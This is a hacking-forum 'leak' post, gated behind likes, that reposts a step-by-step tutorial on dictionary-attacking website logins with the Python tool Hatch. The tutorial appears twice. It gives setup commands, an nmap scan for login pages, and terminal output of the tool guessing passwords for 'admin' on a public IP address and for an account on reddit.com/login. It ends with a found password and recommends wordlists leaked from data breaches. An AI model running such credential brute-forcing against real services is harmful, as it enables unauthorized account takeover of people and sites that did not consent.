Syrex
Divine
Divine
Contributor
Royal
Elite member
Premium
- Thread Author
- #2
LIKE BEFORE LEAVING COMMENT!
YOU WILL BE REPORTED FOR LEECHING IF YOU DONT LIKE, DONT RISK IT!PepeKnife
[HIDE]
The tactic of brute-forcing a login, i.e., trying many passwords very quickly until the correct one is discovered, can be easy for services like SSH or Telnet. For something like a website login page, we must identify different elements of the page first. Thanks to a Python tool for brute-forcing websites called Hatch, this process has been simplified to the point that even a beginner can try it.
How Brute-Force Attacks WorkBrute-force attacks take advantage of automation to try many more passwords than a human could, breaking into a system through trial and error. More targeted brute-force attacks use a list of common passwords to speed this up, called dictionary attacks, and using this technique to check for weak passwords is often the first attack a hacker will try against a system.
In a brute-forcing attack against a service like SSH, it can be done from the command line easily by tools likeSshtrix. In a single line in a terminal, it's easy to launch a dictionary attack against a discovered SSH server using the built-in password list, making services with bad passwords extremely likely to be broken in to.
The biggest downside to a dictionary attack is that if the password does not exist in thepassword list, the attack will fail. If the password used on a targetedis strong, brute-force attacks can quickly become too expensive in time and resources to use as we start having to try every possible combination of characters. Another downside is that many services now do some fashion of rate-limiting, which detects too many failed login attempts and blocks further attempts for a period, which can substantially slow down a brute-force attack.
Why Brute-Force Attacks Are Harder on WebsitesWhile it's easy to attack a service that takes a username and password over the command line, there is a lot more going on in the code of a website. To design this attack, we need to think about what the script needs to know to do its job.
We want the script to find the correct password associated with a particular account by entering a guess into the fields of the login page and submitting it until we get a successful result. To do so, we must interact with the graphical user interface of the login page to input the information into the correct fields of both the login and password fields.
After we do this, we need to submit the guess by clicking on the "Login" button on the page. Finally, we need the script to know the difference between a failure and a success, so that we can stop the script and identify the correct password guess.
All of this is a lot more work and quite confusing for beginners, but after doing so, automating brute-force attacks against the login page of most websites can be done similar to brute-forcing an SSH service.
Hatch for Brute-Forcing Web LoginsPython is an ideal language for automating these kinds of attacks, and Hatch uses Python2 to automate the Chrome web browser to stage a dictionary attack against the login of any webpage with a visible login forum. While some websites with hidden login forums that require you to scroll or click to show can confuse the script, most sites are easy to target using this tool.
Upon launching Hatch, the script opens a Chrome window for you to inspect the elements of the page you are targeting. After telling the script what site you want to brute-force a login to, it will check to see if the page exists and is accessible. If it is, Hatch will ask what login you want to brute-force, and then request a list of passwords to try during the attack.
After Hatch has the information it needs, it will open a second Chrome window and begin automating the attack. You can sit back and watch the attack unfold either in the Chrome window or the terminal that is running the attack. In the terminal, you can watch each password attempt as the script progresses down the list. While this attack is powerful and useful against a wide range of targets, it can also be foiled by rate limiting and other methods of blocking excessive login attempts.
What You'll NeedWhile Hatch is cross-platform, it was a little complicated to set up on some systems. We ended up getting Hatch working on a Windows system with a few modifications to the script, which we've included here.
To follow this guide, you'll need a Windows system with Chrome and Python 2 installed. The current, modern version of Python is Python3, so you'll need to make sure that you're using the right version when you execute the script. If you run Hatch with Python3, it won't work correctly.
You'll also need to install a few dependencies, including a driver, to be able to interact with Chrome programmatically.
Step 1Check Your Version of PythonFirst, we'll need to install a few dependencies. To take care of these, press the Windows key or click the Start menu, then typecmd. After opening a command prompt, make sure you have Python2 installed correctly by typingpython2into the terminal window. You should see aresultlike below.
Code:[/HIDE]
If you don't, you candownload Python2. Once your Python2 is installed, type the following commands to install dependencies.
Code:
Step 2Install the Chrome DriverNext, we'll need to install the driver that allows us to control Chrome from the Python program. To do so, we will download a file fromthe Chrome Driver website, and then create a folder calledwebdriverson your C drive. Move the downloaded file into this folder. While you can place it in another directory, you would need to modify the Python code.
Step 3Download Hatch & InstallTo install Hatch, you can change directory into your C drive before cloning it to make sure you can find it, or change to another location that you'll be able to find. Typecd ..to go to the C drive of your computer, if that's where you want. You can then download a forked version of Hatchfrom the GitHub pageby opening a terminal window and typing the following.
Code:
This forked version has been modified to work on Windows. Once it is done downloading, you can typecd Hatchto change directories into the download folder.
Code:
Step 4Run Hatch & Select Your Router LoginNow that we have Hatch on our system and all of the dependencies installed, it's time to run Hatch and look at the way it works. First, let's look at the help file by running the following from inside the Hatch folder.
Code:
You should see an output like below.
Code:
We can see the main options for Hatch here. To start, let's pick a target on our local network to attack.
A good device on your local network to test this on would be something like a router, a printer, or some other device with a login page on the network. You can select this by running anNmapscan on the network to find any IP addresses that have port 80 open. While port 80 is the most common page for web access, you can also search for ports 81, 8080, 8081, 443 to locate the login pages of various devices.
Next, we'll need to find the subnet range so that we can scan the local network. To find this, you can useipcalcto calculate your subnet range after finding your computer's local IP address. If your computer, for example, has an IP address of 192.168.0.3, you can runipcalc 192.168.0.3to get the IP range for all possible IP addresses on that network. In this case, that would be 192.168.0.0/24.
Once you know the range, run the following Nmap scan on your network, with theiprangeportion changed to add the IP range of your network.
Code:
When this scan returns, any service that lists the port as "open" should be hosting a website. Navigate to one like a printer or router that you have permission to log in to by entering the IP address followed by a colon and the port number we discovered in Nmap. You should see a login page like this:
Step 5Identify the Login ElementsNow, we can run Hatch, but we'll still need some more information in order to pull off this attack. Run Hatch by typing the following command, after navigating to the folder you saved the program to earlier.
Code:
A Google Chrome window should open, allowing us to navigate to a website we want to attack and begin identifying the parts of the website we want to manipulate.
Code:
Enter the URL to the target website's login page into the first prompt from Hatch. It will check to make sure the website exists and can be accessed. Next, we'll need to identify the login and password elements of the website we're attacking.
On our target login page, right-click on the "Username" element, then click on "Inspect."
Next, click on the ellipsis () to the left of the window, and a drop-down menu will appear. Click on "Copy," and then "Copy selector" to copy what Hatch will need to select and interact with this element. It should look something like "#username."
Enter the username selector into Hatch, and then repeat the process with the "Password" selector.
Code:
Finally, right-click on the "Login" button to get the selector information, and add that to Hatch as well.
Now that we have the elements selected, we'll set the username that we're trying to brute-force. In this case, we'll just typeadmin. The final step will be to select the default list that comes with Hatch. This is "passlist.txt" by default, so we'll use this list in our first attack.
Code:
This password list isn't huge, but it does contain many common passwords. PressReturn, and Hatch will open a new window to begin brute-forcing the password with the dictionary attack. You can watch the progress either from the terminal window or by watching the Chrome window that Hatch is automating.
Code:
Step 6Update Your Wordlist & Run Against an External WebsiteIf you're not happy with the wordlist included in Hatch, you can add to it by opening it in a text editor like Nano or adding another wordlist fromany repository of wordlists, such asthose leaked from data breaches. After downloading a wordlist of your choice, you can add it to the "Hatch" folder, and select it instead of the default list.
After the dummy account is set up, rerun Hatch, and enterreddit.com/login(or the login page for the website you chose). Next, paste the selectors into the login, password, and button selector. Finally, enter the target username, and select the password list containing the right credentials. PressReturn, and the script should open a Chrome window and begin automating the attack.
Once the script detects a successful login, it will output the password that succeeded. While the original script tended to skip this and output the wrong password on Windows, my friend Nick modified the code to prevent this from happening in his forked version. If you get any weirdness from the forked version, you can always try theoriginal Hatch version.
Code:
LEAVE A LIKE BEFORE REPLYING!
This leak has been rated as working 0 times this month. (1 times in total)
YOU WILL BE REPORTED FOR LEECHING IF YOU DONT LIKE, DONT RISK IT!PepeKnife
[HIDE]
The tactic of brute-forcing a login, i.e., trying many passwords very quickly until the correct one is discovered, can be easy for services like SSH or Telnet. For something like a website login page, we must identify different elements of the page first. Thanks to a Python tool for brute-forcing websites called Hatch, this process has been simplified to the point that even a beginner can try it.
How Brute-Force Attacks WorkBrute-force attacks take advantage of automation to try many more passwords than a human could, breaking into a system through trial and error. More targeted brute-force attacks use a list of common passwords to speed this up, called dictionary attacks, and using this technique to check for weak passwords is often the first attack a hacker will try against a system.
In a brute-forcing attack against a service like SSH, it can be done from the command line easily by tools likeSshtrix. In a single line in a terminal, it's easy to launch a dictionary attack against a discovered SSH server using the built-in password list, making services with bad passwords extremely likely to be broken in to.
The biggest downside to a dictionary attack is that if the password does not exist in thepassword list, the attack will fail. If the password used on a targetedis strong, brute-force attacks can quickly become too expensive in time and resources to use as we start having to try every possible combination of characters. Another downside is that many services now do some fashion of rate-limiting, which detects too many failed login attempts and blocks further attempts for a period, which can substantially slow down a brute-force attack.
Why Brute-Force Attacks Are Harder on WebsitesWhile it's easy to attack a service that takes a username and password over the command line, there is a lot more going on in the code of a website. To design this attack, we need to think about what the script needs to know to do its job.
We want the script to find the correct password associated with a particular account by entering a guess into the fields of the login page and submitting it until we get a successful result. To do so, we must interact with the graphical user interface of the login page to input the information into the correct fields of both the login and password fields.
After we do this, we need to submit the guess by clicking on the "Login" button on the page. Finally, we need the script to know the difference between a failure and a success, so that we can stop the script and identify the correct password guess.
All of this is a lot more work and quite confusing for beginners, but after doing so, automating brute-force attacks against the login page of most websites can be done similar to brute-forcing an SSH service.
Hatch for Brute-Forcing Web LoginsPython is an ideal language for automating these kinds of attacks, and Hatch uses Python2 to automate the Chrome web browser to stage a dictionary attack against the login of any webpage with a visible login forum. While some websites with hidden login forums that require you to scroll or click to show can confuse the script, most sites are easy to target using this tool.
Upon launching Hatch, the script opens a Chrome window for you to inspect the elements of the page you are targeting. After telling the script what site you want to brute-force a login to, it will check to see if the page exists and is accessible. If it is, Hatch will ask what login you want to brute-force, and then request a list of passwords to try during the attack.
After Hatch has the information it needs, it will open a second Chrome window and begin automating the attack. You can sit back and watch the attack unfold either in the Chrome window or the terminal that is running the attack. In the terminal, you can watch each password attempt as the script progresses down the list. While this attack is powerful and useful against a wide range of targets, it can also be foiled by rate limiting and other methods of blocking excessive login attempts.
What You'll NeedWhile Hatch is cross-platform, it was a little complicated to set up on some systems. We ended up getting Hatch working on a Windows system with a few modifications to the script, which we've included here.
To follow this guide, you'll need a Windows system with Chrome and Python 2 installed. The current, modern version of Python is Python3, so you'll need to make sure that you're using the right version when you execute the script. If you run Hatch with Python3, it won't work correctly.
You'll also need to install a few dependencies, including a driver, to be able to interact with Chrome programmatically.
Step 1Check Your Version of PythonFirst, we'll need to install a few dependencies. To take care of these, press the Windows key or click the Start menu, then typecmd. After opening a command prompt, make sure you have Python2 installed correctly by typingpython2into the terminal window. You should see aresultlike below.
Code:[/HIDE]
C:\> python2 python2 Python 2.7.13 (vs.7.13:a06454b1afa1, Dec 17 2016, 20:53:40) [MSC v.1500 64 bit (AMD64)] on win32 Type "help", "copyright", "credits", or "license" for more information. >>>
If you don't, you candownload Python2. Once your Python2 is installed, type the following commands to install dependencies.
Code:
C:\> pip2 install selenium C:\> pip2 install requests
Step 2Install the Chrome DriverNext, we'll need to install the driver that allows us to control Chrome from the Python program. To do so, we will download a file fromthe Chrome Driver website, and then create a folder calledwebdriverson your C drive. Move the downloaded file into this folder. While you can place it in another directory, you would need to modify the Python code.
Step 3Download Hatch & InstallTo install Hatch, you can change directory into your C drive before cloning it to make sure you can find it, or change to another location that you'll be able to find. Typecd ..to go to the C drive of your computer, if that's where you want. You can then download a forked version of Hatchfrom the GitHub pageby opening a terminal window and typing the following.
Code:
C:\> git clone https://github.com/nsgodshall/Hatch.git
This forked version has been modified to work on Windows. Once it is done downloading, you can typecd Hatchto change directories into the download folder.
Code:
C:\> cd Hatch
Step 4Run Hatch & Select Your Router LoginNow that we have Hatch on our system and all of the dependencies installed, it's time to run Hatch and look at the way it works. First, let's look at the help file by running the following from inside the Hatch folder.
Code:
C:\> python2 main.py -h
You should see an output like below.
Code:
C:\Documents\PythonScripts\Hatch (master -> origin) python2 main.py -h Usage: main.py [options] Options: -h, --help show this help message and exit -u USERNAME, --username=USERNAME Choose the username --usernamesel+USERNAMESEL Choose the username selector --passsel=PASSSEL Choose the password selector --loginsel=LOGINSEL Choose the login button selector --passlist+PASSLIST Enter the password list directory --website=WEBSITE choose a website
We can see the main options for Hatch here. To start, let's pick a target on our local network to attack.
A good device on your local network to test this on would be something like a router, a printer, or some other device with a login page on the network. You can select this by running anNmapscan on the network to find any IP addresses that have port 80 open. While port 80 is the most common page for web access, you can also search for ports 81, 8080, 8081, 443 to locate the login pages of various devices.
Next, we'll need to find the subnet range so that we can scan the local network. To find this, you can useipcalcto calculate your subnet range after finding your computer's local IP address. If your computer, for example, has an IP address of 192.168.0.3, you can runipcalc 192.168.0.3to get the IP range for all possible IP addresses on that network. In this case, that would be 192.168.0.0/24.
Once you know the range, run the following Nmap scan on your network, with theiprangeportion changed to add the IP range of your network.
Code:
C:\> sudo nmap -p 80,8080,81,8081,443 iprange
When this scan returns, any service that lists the port as "open" should be hosting a website. Navigate to one like a printer or router that you have permission to log in to by entering the IP address followed by a colon and the port number we discovered in Nmap. You should see a login page like this:
Step 5Identify the Login ElementsNow, we can run Hatch, but we'll still need some more information in order to pull off this attack. Run Hatch by typing the following command, after navigating to the folder you saved the program to earlier.
Code:
C:\> python2 main.py
A Google Chrome window should open, allowing us to navigate to a website we want to attack and begin identifying the parts of the website we want to manipulate.
Code:
C:\Documents\PythonScripts\Hatch (master -> origin) python2 main.py -h DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | | | | | | | | | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> coded by Metachar [-]--> brute-force tool [~] Enter a website: http://202.216.246.99/ [!] Checking if site exists [OK]
Enter the URL to the target website's login page into the first prompt from Hatch. It will check to make sure the website exists and can be accessed. Next, we'll need to identify the login and password elements of the website we're attacking.
On our target login page, right-click on the "Username" element, then click on "Inspect."
Next, click on the ellipsis () to the left of the window, and a drop-down menu will appear. Click on "Copy," and then "Copy selector" to copy what Hatch will need to select and interact with this element. It should look something like "#username."
Enter the username selector into Hatch, and then repeat the process with the "Password" selector.
Code:
C:\Documents\PythonScripts\Hatch (master -> origin) python2 main.py -h DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | | | | | | | | | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> coded by Metachar [-]--> brute-force tool [~] Enter a website: http://202.216.246.99/ [!] Checking if site exists [OK] [~] Enter the username selector: #username [~] Enter the password selector: #passwd [~] Enter the Login button selector:
Finally, right-click on the "Login" button to get the selector information, and add that to Hatch as well.
Now that we have the elements selected, we'll set the username that we're trying to brute-force. In this case, we'll just typeadmin. The final step will be to select the default list that comes with Hatch. This is "passlist.txt" by default, so we'll use this list in our first attack.
Code:
C:\Documents\PythonScripts\Hatch (master -> origin) python2 main.py -h DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | | | | | | | | | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> coded by Metachar [-]--> brute-force tool [~] Enter a website: http://202.216.246.99/ [!] Checking if site exists [OK] [~] Enter the username selector: #username [~] Enter the password selector: #passwd [~] Enter the Login button selector: #login_ok [~] Enter the username to brute-force: admin [~] Enter a directory to a password list: passlist.txt DevTools listerning on ws://127.0.0.1:7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705d DevTools listerning on ws://127.0.0.1:7848/devtools/browser/33d370d5-46db-4d56-b5f4-a78554e07316
This password list isn't huge, but it does contain many common passwords. PressReturn, and Hatch will open a new window to begin brute-forcing the password with the dictionary attack. You can watch the progress either from the terminal window or by watching the Chrome window that Hatch is automating.
Code:
C:\Documents\PythonScripts\Hatch (master -> origin) python2 main.py -h DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | | | | | | | | | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> coded by Metachar [-]--> brute-force tool [~] Enter a website: http://202.216.246.99/ [!] Checking if site exists [OK] [~] Enter the username selector: #username [~] Enter the password selector: #passwd [~] Enter the Login button selector: #login_ok [~] Enter the username to brute-force: admin [~] Enter a directory to a password list: passlist.txt DevTools listerning on ws://127.0.0.1:7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705d DevTools listerning on ws://127.0.0.1:7848/devtools/browser/33d370d5-46db-4d56-b5f4-a78554e07316 ------------------------ Tried password: 123456 for user: admin ------------------------ ------------------------ Tried password: password for user: admin ------------------------ ------------------------ Tried password: qwerty for user: admin ------------------------ ------------------------ Tried password: Hackthis1 for user: admin
Step 6Update Your Wordlist & Run Against an External WebsiteIf you're not happy with the wordlist included in Hatch, you can add to it by opening it in a text editor like Nano or adding another wordlist fromany repository of wordlists, such asthose leaked from data breaches. After downloading a wordlist of your choice, you can add it to the "Hatch" folder, and select it instead of the default list.
- Don't Miss:Automate Brute-Force Attacks for Nmap Scans
After the dummy account is set up, rerun Hatch, and enterreddit.com/login(or the login page for the website you chose). Next, paste the selectors into the login, password, and button selector. Finally, enter the target username, and select the password list containing the right credentials. PressReturn, and the script should open a Chrome window and begin automating the attack.
Once the script detects a successful login, it will output the password that succeeded. While the original script tended to skip this and output the wrong password on Windows, my friend Nick modified the code to prevent this from happening in his forked version. If you get any weirdness from the forked version, you can always try theoriginal Hatch version.
Code:
_ _ _ _ | | | | | | | | | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> coded by Metachar [-]--> brute-force tool [~] Enter a website: http://www.reddit.com/login [!] Checking if site exists [~] Enter the username selector: #loginUsername [~] Enter the password selector: #loginPassword [~] Enter the Login button selector: body > div > div > div.PageColumn.PageColumn__right > div > form > fieldset:nth-child(10) > button [~] Enter the username to brute-force: hackthisaccountNB [~] Enter a directory to a password list: passlist.txt DevTools listerning on ws://127.0.0.1:11301/devtools/browser/6fd2f19e-9fef-4921-863f-d3316ec3b808 DevTools listerning on ws://127.0.0.1:11318/devtools/browser/f8d672c9-8e46-477c-a93d-baf0ea6b50e1 ------------------------ Tried password: 123456 for user: hackthisaccountNB ------------------------ ------------------------ Tried password: password for user: hackthisaccountNB ------------------------ ------------------------ Tried password: qwerty for user: hackthisaccountNB ------------------------ AN ELEMENT HAS BEEN REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS! LAST PASS ATTEMPT BELOW Password has been found: qwerty Have fun :)
LEAVE A LIKE BEFORE REPLYING!
This leak has been rated as working 0 times this month. (1 times in total)